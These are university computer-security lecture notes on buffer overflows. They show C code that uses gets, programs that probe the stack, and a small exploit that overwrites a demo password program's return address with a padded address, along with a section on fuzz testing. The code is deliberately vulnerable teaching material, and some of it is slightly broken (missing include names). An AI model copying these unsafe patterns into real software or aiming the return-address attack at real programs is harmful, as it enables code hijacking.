Attacking The Return Address

Part of 22C:169, Computer Security Notes
by Douglas W. Jones
THE UNIVERSITY OF IOWA Department of Computer Science

Buffer Overflow

Consider this bit of C code intended to get a number from the input stream:

#include <stdio.h>
#include <stdlib.h>
int getnum() {
        char buf[32];
        gets(buf);
        return atoi(buf);
}

Here, gets and atoi are routines in the standard C library to get a string from the standard input (gets from stdio.h) and convert from a textual string to an integer (atoi from stdlib.h.

This code is typical of thousands, perhaps millions of lines of C and C++ code written around the world. Code like this has found its way into compilers, web web browsers, text editors, input-output drivers and many other contexts.

The problem with this code is that the input primitive it uses has no idea how long a string to get. It simply gets one line of data, whether that is one character of 100. Since the line is only supposed to contain a number, correct input to the program will never involve very long lines of text, this testing of a program using this routine may never reveal a problem unless the person designing the test knows about the risk.

In this case, the risk is that the programmer only allowed for lines of 31 or fewer characters. Recall that C and C++ strings always end with a null character, so if someone types a line 31 characters long, the string that results is actually 32 bytes, including tha null.

Of course, the programmer should never have used gets. The designers of C included this routine in their standard library early on in the development of the language, and only later realized that including it had been a mistake. By then, there were so many C programs out there using this routine that they couldn't just eliminate it, so they put a warning in the manual encouraging programmers to use fgets instead, but it remains available and tempting, to this day.

Consider including the above routine with this trivial main program.

int main() {
        for (;;) {
                int i;
                printf("Enter a number ");
                i = getnum();
                printf("Your number was: %d\n", i);
        }
}

This program just gets a number from the terminal and echos it, not very exciting at all. Now, try running the program with an eye to what the program will do when yor input string is too long. There are two possibilities, both fatal:

If the stack grows up: In this case, pushing on the stack increments the stack pointer. If the string is larger than the 32 character buffer, it will overwrite the next activation record on the stack -- in this case, the activation record of the gets routine that was called to fill the buffer. When it comes time for gets to return, the return address will have been overwritten by the input data, so the return will be "into the wild blue".

If the stack grows down: In this case, pushing on the stack decrements the stack pointer. If the string is larger than the 32 character buffer, it will overwrite whatever was pushed on the stack before the call to getnum, but before it gets there, it will overwrite the return address of getnum itself and anything else that was implicitly pushed onto the stack on the way to entering this getnum.

Either way, the program is unlikely to continue operating normally. Try experimenting with this routine. See what it does.

Experimenting with Deliberate Damage to the Stack

From the previous lecture, we developed a vague idea of where the return address was stored in the activation record. We can construct a little program to allow us to explore the details of this by probing different locations.

#include <stdio.h>
#include <stdlib.h>
int offset; /* offset into stack to probe */
void probe() {
        char * p;
        p = (char *)&p;
        p[offset] = '\x55';
}

int main(int argc, char * argv[]) {
        offset = atoi(argv[1]);
        probe();
        putstr("No damage\n");        
}

Note, this main program takes its input from the command line arguments provided when the program is launched. The parameters to a C or C++ main program launched from the command line under Unix, Linux or Microsoft's DOS are, argc, an integer count of the command line arguments, and argv, an array of pointers to strings, one string per argument. argv[1] points to the first command line argument, and because C and C++ think that an array is the same as a pointer to the first element of that array, argv[1][0] is the first character of the first argument.

Note: This program really stinks. It ought to have, at the very least, checked to see that the argument was passed. If you don't type in an argument, so argc is zero, argv[1] will be a null pointer, and the attempt to look at the string it points to will likely result in an addressing error.

Using this program, we can probe around in memory, relative to the activaiton record of probe, looking for memory locations that cause damage. We know that return addresses are probably 32-bit numbers, so using the results of the experiments in the previous lecture, we can guess roughly the offsets that will cause the most damage. It is highly likely that 4 offsets in this range will cause our little program to fail.

Experiment. Find the specific offsets from that cause the program to fail instead of returning with no damage.

A Bit of C/C++ Obscurity

In C and C++, the name of a function is a pointer to that function. Consider this bit of code to demonstrate this fact:

#include <stdio.h>
void printit(char * s, char * p) {
        printf("%s = %x;", s, (long int)p);
        printf(" first 2 bytes %x %x", p[0], p[1] );
}

main() {
        printit( "printit", (char *)printit );
        printit( "main", (char *)main );
}

Here, the printit routine prints out the name of the subroutine, passed as a string, the address of the subroutine, passed as a pointer (to a character), and the first two bytes of that subroutine, printed by following that pointer. These two bytes are actual machine instructions. The address and the instructions are printed in hex.

The main program simply requests information on each of the routines in the program (there are only two). It casts the function names to type char* in order to meet the requirements of printit.

When you run this program, you will find that (to no great surprise), that the compiler compiles the routines of your program in the order you wrote them, and that the first few instruction bytes of each routine are always the same because the receiving sequences are always the same. That is, the sequence of instructions used to receive control from the caller are always the same -- typically instructions to save something, registers or the return address, on the stack.

Exploits

Now that we know, to a fair degree of certainty, where the return address of the function is, we should be able to exploit it to cause that function to return to the wrong place. Consider the following bit of code:

#include <stdio.h>
#include <stdlib.h>
void wrongplace() {
        printf("We got to the wrong place\n");
        exit();
}

int offset; /* offset into stack to probe */
void probe() {
        char * p;
        p = (char *)&p;
        *(void **)(&p[offset]) = (void *)wrongplace;
}

int main(int argc, char * argv[]) {
        offset = atoi(argv[1]);
        probe();
        puts("No damage\n");        
}

Where the previous program merely probed into its stack by writing nonsense over one byte, this program probes into its stack by writing a pointer, probably a 4-byte value on most modern computers, into the designated part of its stack. This pointer is a pointer to the subroutine wrongplace, and if you probe the stack with the correct offset into the stack, the result will be that probe returns by entering wrongplace. Of course, it enters wrongplace in an awkward way, thinking that it was returning from a function, and certainly not pushing a return address on the stack. This is why wrongplace was written to terminate by calling exit, terminating the entire program.

The attack we demonstrated above was, of course, a self-attack, but we can make it into a useful attack if we can get the address of a subroutine within the program we wish to attack and slip this address into the string of characters that the program reads using gets or any of a large number of other vulnerable input routines that C and C++ programmers have used over the years.

Another Exploit

Consider this program:

#include 
#include 

int checkpassword( char * password ) {
        char buf[32]; /* NO BOUNDS CHECKING ON THIS ARRRAY */
        gets(buf);    /* <- SERIOUS SECURITY VULNERABILITY */
        return (strcmp(buf, password) == 0);
}

void secureapplication() {
        /* imagine that this code did something the attacker wanted to do */
        printf("Woo Hoo, You Hit the Jackpot\n");
        exit(0);
}

int main() {
        printf("Enter password: ");
        for (;;) {
                int i;
                if (checkpassword("Password!")) secureapplication();
                printf("Wrong Password, try again: ");
        }
}

It has a typical security vulnerability in it, in this case, a password check that is vulnerable to a buffer overflow attack. Simply looking at the binary file using the Unix cat utility to throw the binary text to the screen, a number of strings jump out, for example:

Woo Hoo, You Hit the JackpotEnter password: Password!Wrong Password, try again:

In the middle of this text is the mysterious string Password! that doesn't show up in any of the interaction with the program an experimenter might be likely to try. Since it isn't obviously output, one thing an attacker might try is using it as input. When you do that, you discover that it is the password to the program. There is a lesson here:

Never embed passwords or cryptographic keys in a program in a form that can be extracted by examining the object file.

Some other strings also show up:

... victim.c_GLOBAL_OFFSET_TABLE ... startprintf@@GLIBC_2.2.5checkpassword ...
GLIBC_2.2.5exit@@GLIBC_2.2.5_finisecureapplication__libc_start_main@@GLIBC ...

There is a lot of gibberish here, but among the bits are the file name victim.c and the names of functions. Some are called functions like exit and printf, while others are clearly related to the application, like checkpassword, secureapplication and main. These are obvious candidates to attempt to invoke directly, from outside the program, bypassing the logic of the program that might otherwise control access to them.

Most systems support one or another debugger that can be used to examine executable files in a more organized way. One widely used debugger is gdb, the Gnu debugger. Running this debugger on the binary file victim, we can ask for values of symbols. For example,

(gdb) print secureapplication
$1 = {} 0x400619 

Here, we learn that the symbol secureapplication has the value 40061916. What do we do with this?

A quick binary search, typing first 8 and then 16 and then 32 and then 64 characters of input to the victim's password prompt, shows that the password buffer is under 64 characters long but more than 32. We get a segmentation fault each time we type too many characters. Narrowing it down, we find that typing any password longer than 39 characters causes a segmentation fault. This leads us to formulate the following attack program:

#include 

int main() {
        void * addr = (void *) 0x00400619; /* new program counter */
        char * s = (char *)&addr; /* access to the above as bytes */
        int i;

        /* padding */
        for (i = 0; i < 40; i++) putchar(' ');

        /* the proposed new value to put in the return address */
        for (i = 0; i < 8; i++) putchar(s[i]);

        /* newline */
        putchar('\n');
}

Remarkably, this attack program worked on the first try!

[jones@serv15 ~]$ attack | victim
Enter password: Woo Hoo, You Hit the Jackpot

Fuzz Testing

So how do you determine that a program is secure against this kind of attack methodology? First, of course, you could read all of the code looking for vulnerabilities. This is labor intensive and not at all fun.

Second, you could try a very simple attack:

/* fuzztest.c -- a fuzz testing program */

#include 
#include 

int main() {
        for (;;) {
                putchar( random() );
        }
}

The above code outputs a random sequence of characters, with all characters equally likely. This data stream is complete nonsense, with lines that average 256 characters long, but all line lengths are possible. Piping the output of this program into our victim produces this output:

[jones@serv15 ~]$ fuzztest | victim
Segmentation fault

This is called fuzz testing. It is an extraordinarily stupid testing methodology, needing no understanding of the software being tested. Just inject random data into all of the inputs of the program and see what happens. Solidly written code should output error messages and behave well. Poorly written code will typically fail badly, going into infinite loops or raising unhandled exceptions (such as the segmentation fault in this case).

In practice, most programs that were not carefully written with safe and secure operation in mind fail fuzz testing. Most of the standard Unix utilities failed fuzz testing when first subjected to it, and many programs in common use today still fail fuzz testing. Had Microsoft used fuzz testing on their RTF interpreter, they could have avoided an embarrassing vulnerability that led to something called "the email of doom" a decade ago, an e-mail attachment containing a malformed format effector that caused Windows computers to crash as soon as they tried to show the e-mail.